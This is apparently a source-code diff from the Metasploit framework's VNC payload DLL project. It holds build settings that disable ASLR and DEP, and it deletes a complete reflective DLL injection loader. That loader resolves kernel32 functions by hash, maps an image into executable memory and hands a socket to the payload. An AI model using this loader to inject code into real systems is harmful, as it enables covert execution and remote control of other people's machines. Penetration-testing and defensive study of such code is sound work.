<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
<ClCompile Include="context.c" />
<ClCompile Include="loader.c" />
<ClCompile Include="inject.c" />
<ClCompile Include="ps.c" />
<ClCompile Include="session.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="context.h" />
<ClInclude Include="loader.h" />
<ClInclude Include="inject.h" />
<ClInclude Include="ps.h" />
<ClInclude Include="session.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\winvnc\WinVNC.vcxproj">
<Project>{ea6a09ac-04bb-423d-8842-ca48df901058}</Project>
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

65
external/source/vncdll/vncdll/vncdll.vcxproj.filters vendored Executable file
View File

@ -0,0 +1,65 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Source Files\core">
<UniqueIdentifier>{7c56685d-83b5-4541-b5dd-a620ffe19b23}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Header Files\core">
<UniqueIdentifier>{6b6dd5ba-1f40-449f-a55b-7180bb0793a0}</UniqueIdentifier>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="context.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="loader.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="inject.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="ps.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="session.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
<Filter>Source Files\core</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="context.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="loader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="inject.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="ps.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="session.h">
<Filter>Header Files\core</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
</Project>

53
external/source/vncdll/winvnc/ReflectiveDLLInjection.h vendored
View File

@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//

457
external/source/vncdll/winvnc/ReflectiveLoader.c vendored
View File

@ -1,457 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
/*
* Use Reflective DLL Injection.
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//

197
external/source/vncdll/winvnc/ReflectiveLoader.h vendored
View File

@ -1,197 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
